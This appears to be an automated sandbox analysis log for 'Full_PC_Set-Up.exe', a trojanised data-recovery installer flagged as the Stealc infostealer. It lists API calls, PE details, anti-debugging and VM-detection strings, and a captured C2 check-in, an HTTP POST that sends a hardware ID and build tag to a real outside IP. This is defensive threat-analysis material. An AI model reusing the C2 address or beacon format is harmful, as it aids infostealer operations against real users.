Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0030D910 CreateFileW,CreateFileW,GetLastError,GetLastError,swprintf,CreateFileW,GetLastError,__wsplitpath,CloseHandle,CreateFileW,GetLastError,CloseHandle,CloseHandle,ReadFile,ReadFile,WriteFile,ReadFile,WriteFile,WriteFile,ReadFile,WriteFile,WriteFile,CloseHandle,CloseHandle,OpenEncryptedFileRawW,SetFilePointer,WriteEncryptedFileRaw,CloseEncryptedFileRaw,CloseHandle,DeleteFileW,GetLastError,CloseHandle,
Source: Full_PC_Set-Up.exe
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Full_PC_Set-Up.exe
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Full_PC_Set-Up.exe
Binary string: d:\work\edr\bin\Release\7DataPartitionRecovery.pdb
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00374078 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_002CCA90 _memset,_memset,_memset,GetLogicalDrives,GetDriveTypeW,GetVolumeInformationW,GetLastError,CreateFileW,CloseHandle,DeleteFileW,FindFirstFileW,FindClose,CreateFileW,CloseHandle,
Source: Network traffic
Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49735 -> 45.200.148.115:80
Source: global traffic
HTTP traffic detected: GET / HTTP/1.1Host: 45.200.148.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic
HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHDHost: 45.200.148.115Content-Length: 208Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 35 44 35 45 36 32 46 45 45 35 38 34 35 37 37 30 33 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 2d 2d 0d 0a Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="hwid"865D5E62FEE5845770397------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="build"b6------JDGCGDBGCAAEBFIECGHD--
Source: Joe Sandbox View
ASN Name: Africa-on-Cloud-ASZA Africa-on-Cloud-ASZA
Source: unknown
TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: Full_PC_Set-Up.exe, 00000000.00000000.1798820680.00000000004DA000.00000002.00000001.01000000.00000003.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1876438795.00000000004DA000.00000002.00000001.01000000.00000003.sdmp
String found in binary or memory: K*7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{U@ equals www.facebook.com (Facebook)
Source: Full_PC_Set-Up.exe, 00000000.00000000.1798820680.00000000004DA000.00000002.00000001.01000000.00000003.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1876438795.00000000004DA000.00000002.00000001.01000000.00000003.sdmp
String found in binary or memory: K*7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{U@ equals www.twitter.com (Twitter)
Source: Full_PC_Set-Up.exe
String found in binary or memory: KA7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{l@ equals www.facebook.com (Facebook)
Source: Full_PC_Set-Up.exe
String found in binary or memory: KA7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{l@ equals www.twitter.com (Twitter)
Source: unknown
HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHDHost: 45.200.148.115Content-Length: 208Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 35 44 35 45 36 32 46 45 45 35 38 34 35 37 37 30 33 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 2d 2d 0d 0a Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="hwid"865D5E62FEE5845770397------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="build"b6------JDGCGDBGCAAEBFIECGHD--
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://45.200.148.115
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000001007000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://45.200.148.115/
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.php
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000001007000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.php2
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.phpM
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.phpS
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.phpq
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://7datarecoverysoftware.com/7dptr-order/?ref=apphttp://7datarecoverysoftware.comhttp://7datarec
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://7datarecoverysoftware.com/enable-usb-debugging/http://7datarecoverysoftware.com/usb-connect-a
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://aia.startssl.com/certs/ca.crt02
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://aia1.wosign.com/ca1g2-code3.cer0
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://aia1.wosign.com/ca1g2-ts.cer0
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://aia1.wosign.com/ca1g2.ts.cer0
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://aia1.wosign.com/ca6.code3.cer06
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://crl.startssl.com/sfsca.crl0
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://crls1.wosign.com/ca1.crl0h
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://crls1.wosign.com/ca1.crl0k
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://crls1.wosign.com/ca1g2-ts.crl0m
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://crls1.wosign.com/ca6-code3.crl0P
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://ocsp.startssl.com/ca00
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://ocsp1.wosign.com/ca10/
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://ocsp1.wosign.com/ca102
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://ocsp1.wosign.com/ca1g2/ts0/
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://ocsp1.wosign.com/ca6/code300
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://www.kungsoft.com
Source: Full_PC_Set-Up.exe
String found in binary or memory: http://www.wosign.com/policy/0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_004B6680: _memset,DeviceIoControl,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0038E41F
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0038D97B
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_002BA050
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_002DA0C0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_003960CB
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00484130
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_004AC1A9
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_003601D0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_004042B0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00324370
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0039E486
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0039C75A
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00366A4A
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00404AB0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0048EBD0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00372CFB
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0038ED0D
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0040ED80
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_003D4E30
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_002F2E30
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_003F8F30
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0039EF0E
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_002C8FB0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_002F7030
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00305140
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00321200
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00323370
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0040F3B0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_003853CA
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0038D4D0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0038D5DD
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_004016E0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_002DB6E0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00403710
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0038D7B5
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_002B3800
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0030F870
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0038D8B2
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_003399B0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00407A20
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0048DB70
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00391BAB
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_003D5B80
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00403D30
Code function: String function: 00383725 appears 37 times
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: String function: 0040E430 appears 123 times
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: String function: 00388CFC appears 45 times
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: String function: 0040E370 appears 60 times
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: String function: 00388BEF appears 49 times
Source: Full_PC_Set-Up.exe
Static PE information: invalid certificate
Source: Full_PC_Set-Up.exe
Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: Full_PC_Set-Up.exe
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Full_PC_Set-Up.exe
Binary string: B\Device\HarddiskDmVolumes\%c:IOCTL_DISK_GET_DRIVE_LAYOUT_EX GetLastError %dIOCTL_DISK_GET_DRIVE_LAYOUT GetLastError %d\Device\Harddisk%u\Partition%u\\.\MountPointManager\DosDevices\\??\Volume{IOCTL_MOUNTMGR_QUERY_POINTS GetLastError %dKernel32.dllGetVolumePathNamesForVolumeNameW\\?\Volume{%s%02x%02x%02x%02x-%02x%02x-%02x%02x-}\%02x%02x-%02x%02x%02x%02x%02x%02x%sbatch_read_sector start %I64d, count: %I64dni(%d) > c_block_count
Source: classification engine
Classification label: mal76.troj.expl.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_002CC8D0 GetDiskFreeSpaceExW,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_002ECA70 GetWindowRect,CoCreateInstance,SendMessageW,SendMessageW,SendMessageW,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0036A09D __EH_prolog3_catch,FindResourceW,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\AR7OIXQT.htm
Source: Full_PC_Set-Up.exe
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: version.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: oledlg.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Full_PC_Set-Up.exe
Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Full_PC_Set-Up.exe
Static file information: File size 7230768 > 1048576
Source: Full_PC_Set-Up.exe
Static PE information: Raw size of .text is bigger than: 0x100000 < 0x248800
Source: Full_PC_Set-Up.exe
Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x14fa00
Source: Full_PC_Set-Up.exe
Static PE information: Raw size of .reloc is bigger than: 0x100000 < 0x298a00
Source: Full_PC_Set-Up.exe
Static PE information: More than 200 imports for USER32.dll
Source: Full_PC_Set-Up.exe
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Full_PC_Set-Up.exe
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Full_PC_Set-Up.exe
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Full_PC_Set-Up.exe
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Full_PC_Set-Up.exe
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Full_PC_Set-Up.exe
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Full_PC_Set-Up.exe
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Full_PC_Set-Up.exe
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Full_PC_Set-Up.exe
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Full_PC_Set-Up.exe
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Full_PC_Set-Up.exe
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00298550 GetModuleHandleW,LoadLibraryW,GetProcAddress,GetObjectW,
Source: Full_PC_Set-Up.exe
Static PE information: real checksum: 0x48470d should be: 0x6f0441
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00388CC7 push ecx; ret (0_2_00388CDA)
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00388D41 push ecx; ret (0_2_00388D54)
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0029A370 GetSystemDefaultLangID, push 00000419h
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
API coverage: 0.1 %
Source: all processes
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp
Binary or memory string: VMwareVMware
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp
Binary or memory string: Hyper-V RAW
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.000000000102F000.00000004.00000020.00020000.00000000.sdmp
Binary or memory string: Hyper-V RAW>
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_003812A6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0039FBF7 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_002961A0 CoInitialize,GetCommandLineW,CommandLineToArgvW,LocalFree,CreateMutexW,SetUnhandledExceptionFilter,InitCommonControlsEx,__wsetlocale,GdiplusStartup,DefWindowProcW,LoadIconW,LoadCursorW,GetStockObject,RegisterClassW,MessageBoxW,GetLastError,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00381608 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0038B6F3 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_00299E20 CoInitialize,GetCommandLineW,CommandLineToArgvW,LocalFree,CreateMutexW,SetUnhandledExceptionFilter,InitCommonControlsEx,__wsetlocale,GdiplusStartup,DefWindowProcW,LoadIconW,LoadCursorW,GetStockObject,RegisterClassW,MessageBoxW,GetLastError,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Memory protected: page guard
Source: Yara match
File source: Process Memory Space: Full_PC_Set-Up.exe PID: 7444, type: MEMORYSTR
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_002C1CA0 AllocateAndInitializeSid,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,FreeSid,GetTokenInformation,GetTokenInformation,_calloc,FreeSid,CloseHandle,GetTokenInformation,EqualSid,FreeSid,CloseHandle,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0039D105 GetLocaleInfoA,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_002DA760 GetFileType,SetFilePointer,GetLocalTime,SystemTimeToFileTime,FileTimeToDosDateTime,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_0038F75F __get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe
Code function: 0_2_003D2A00 _memset,GetVersionExW,
Source: Yara match
File source: 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match
File source: 00000000.00000002.1878986975.0000000002C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match
File source: Process Memory Space: Full_PC_Set-Up.exe PID: 7444, type: MEMORYSTR
Source: Yara match
File source: dump.pcap, type: PCAP